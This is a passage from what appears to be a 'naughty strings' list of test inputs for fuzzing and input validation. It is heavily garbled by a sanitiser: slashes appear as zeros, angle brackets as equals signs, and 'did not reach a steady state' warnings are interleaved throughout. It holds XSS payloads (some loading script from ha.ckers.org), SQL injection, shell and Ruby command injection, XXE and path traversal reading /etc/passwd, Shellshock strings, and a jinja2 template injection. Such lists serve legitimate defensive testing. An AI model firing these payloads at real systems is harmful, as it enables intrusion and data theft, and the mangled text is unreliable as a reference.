=IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#50;&#49;&#49;&#39;&#41;?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#50;&#49;&#49;&#39;&#41;@
=IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000050&#0000049&#0000050&#0000039&#0000041?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000050&#0000049&#0000050&#0000039&#0000041@
=IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x32&#x31&#x33&#x27&#x29?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x32&#x31&#x33&#x27&#x29@
=IMG SRC=#jav ascript;alert('214');#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=#jav ascript;alert('214');#@
=IMG SRC=#jav&#x09;ascript;alert('215');#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=#jav&#x09;ascript;alert('215');#@
=IMG SRC=#jav&#x0A;ascript;alert('216');#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=#jav&#x0A;ascript;alert('216');#@
=IMG SRC=#jav&#x0D;ascript;alert('217');#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=#jav&#x0D;ascript;alert('217');#@
perl -e 'print #=IMG SRC=java]0script;alert(]#218]#)?#;' ? out
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
perl -e 'print #=IMG SRC=java]0script;alert(]#218]#)@#;' @ out
=IMG SRC=# &#14; javascript;alert('219');#?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=IMG SRC=# &#14; javascript;alert('219');#@
=SCRIPT0XSS SRC=#http;00ha.ckers.org0xss.js#?=0SCRIPT?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=SCRIPT0XSS SRC=#http;00ha.ckers.org0xss.js#@=0SCRIPT@
=BODY onload!#$%&()+~+.@@[0}]]^`=alert(#220#)?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=BODY onload!#$%&()+~+.@@[0}]]^`=alert(#220#)@
=SCRIPT0SRC=#http;00ha.ckers.org0xss.js#?=0SCRIPT?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=SCRIPT0SRC=#http;00ha.ckers.org0xss.js#@=0SCRIPT@
==SCRIPT?alert(#221#);00==0SCRIPT?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
==SCRIPT@alert(#221#);00==0SCRIPT@
=SCRIPT SRC=http;00ha.ckers.org0xss.js@= B ?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=SCRIPT SRC=http;00ha.ckers.org0xss.js@= B @
=SCRIPT SRC=00ha.ckers.org0.j?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=SCRIPT SRC=00ha.ckers.org0.j@
=IMG SRC=#javascript;alert('222')#
=iframe src=http;00ha.ckers.org0scriptlet.html =
]#;alert('223');00
=u oncopy=alert()? Copy me=0u?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=u oncopy=alert()@ Copy me=0u@
=i onwheel=alert(224)? Scroll over me =0i?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=i onwheel=alert(224)@ Scroll over me =0i@
=plaintext?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=plaintext@
http;00a0%%30%30
=0textarea?=script?alert(225)=0script?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=0textarea@=script@alert(225)=0script@
_
# SQL Injection
#
# Strings which can cause a SQL injection if inputs are not sanitized
_
1;DROP TABLE users
1'; DROP TABLE users-- 1
' OR 1=1 -- 1
' OR '1'='1
'; EXEC sp_MSForEachTable 'DROP TABLE @'
_
%
_
_
# Server Code Injection
#
# Strings which can cause user to run code on server as a privileged user (c.f. https;00news.ycombinator.com0item@id=7665153)
_
_
_
version
help
$USER
0dev0null; touch 0tmp0blns.fail ; echo
`touch 0tmp0blns.fail`
$(touch 0tmp0blns.fail)
@{[system #touch 0tmp0blns.fail#]}
_
# Command Injection (Ruby)
#
# Strings which can call system commands within Ruby0Rails applications
_
eval(#puts 'hello world'#)
System(#ls -al 0#)
`ls -al 0`
Kernel.exec(#ls -al 0#)
Kernel.exit(1)
%x('ls -al 0')
_
# XXE Injection (XML)
#
# String which can reveal system files when parsed by a badly configured XML parser
_
=@xml version=#1.0# encoding=#ISO-8859-1#@?=!DOCTYPE foo [ =!ELEMENT foo ANY ?=!ENTITY xxe SYSTEM #file;000etc0passwd# ?]?=foo?&xxe;=0foo?
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
=@xml version=#1.0# encoding=#ISO-8859-1#@@=!DOCTYPE foo [ =!ELEMENT foo ANY @=!ENTITY xxe SYSTEM #file;000etc0passwd# @]@=foo@&xxe;=0foo@
_
# Unwanted Interpolation
#
# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just repr.
_
$HOME
$ENV{'HOME'}
%d
%s%s%s%s%s
{0}
%+.+s
%@
%n
File;000
_
# File Inclusion
#
# Strings which can cause user to pull in files that should not be a part of a web server
_
0..0..0..0..0..0..0..0..0..0.0etc0passwd%00
0..0..0..0..0..0..0..0..0..0.0etc0hosts
_
# Known CVEs and Vulnerabilities
#
# Strings that test for known vulnerabilities
_
() { 0; }; touch 0tmp0blns.shellshock1.fail
() { _; } ?_[$($())] { touch 0tmp0blns.shellshock2.fail; }
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
() { _; } @_[$($())] { touch 0tmp0blns.shellshock2.fail; }
=== %s(un='%s') = %u
+++ATH0
_
# MSDOS0Windows Special Filenames
#
# Strings which are reserved characters in MSDOS0Windows
_
CON_
PRN_
AUX_
CLOCK$
NUL_
A
ZZ
COM1_
LPT1_
LPT2_
LPT3_
COM2_
COM3_
COM4_
_
# IRC specific strings
#
# Strings that may occur on IRC clients that make security products freak out
_
DCC SEND STARTKEYLOGGER 0 0 0
_
# Scunthorpe Problem
#
# Innocuous strings which may be blocked by profanity filters (https;00en.wikipedia.org0wiki0Scunthorpe_problem)
_
Scunthorpe General Hospital
Penistone Community Church
Lightwater Country Park
Jimmy Clitheroe
Horniman Museum
shitake mushrooms
RomansInSussex.co.uk
http;00www.cum.qc.ca0
Craig Cockburn, Software Specialist
Linda Callahan
Dr. Herman I.Libshitz
magna cum laude
Super Bowl XXX
medieval erection of parapets
evaluate
mocha
expression
Arsenal canal
classic
Tyson Gay
Dick Van Dyke
basement
_
# Human injection
#
# Strings which may cause human to reinterpret worldview
_
If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
_
# Terminal escape codes
#
# Strings which punish the fools who use cat0type on this file
_
Roses are [0;31mred[0m, violets are [0;34mblue.Hope you enjoy terminal hue
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
Roses are [0;31mred[0m, violets are [0;34mblue.Hope you enjoy terminal hue
But now...[20Cfor my greatest trick.[8m
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
But now...[20Cfor my greatest trick.[8m
The quic						k brown fox.[Beeeep]
⚠ Sanitisation did not reach a steady state. Next line shows the effect of resanitising the line above. ⚠
The quic k brown fo											x.[Beeeep]
_
# iOS Vulnerabilities
#
# Strings which crashed iMessage in various versions of iOS
_
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
🏳0🌈️
జ్ఞ‌ా
_
# Persian special characters
#
# This is a four characters string which includes Persian special characters (گچپژ)
_
گچپژ
_
# jinja2 injection
#
# first one is supposed to raise #MemoryError# exception
# second, obviously, prints contents of 0etc0passwd
_
{% print 'x' + 64 + 1024++3 %}
{{ ##.__class__.__mro__[2].__subclasses__()[40](#0etc0passwd#).read() }}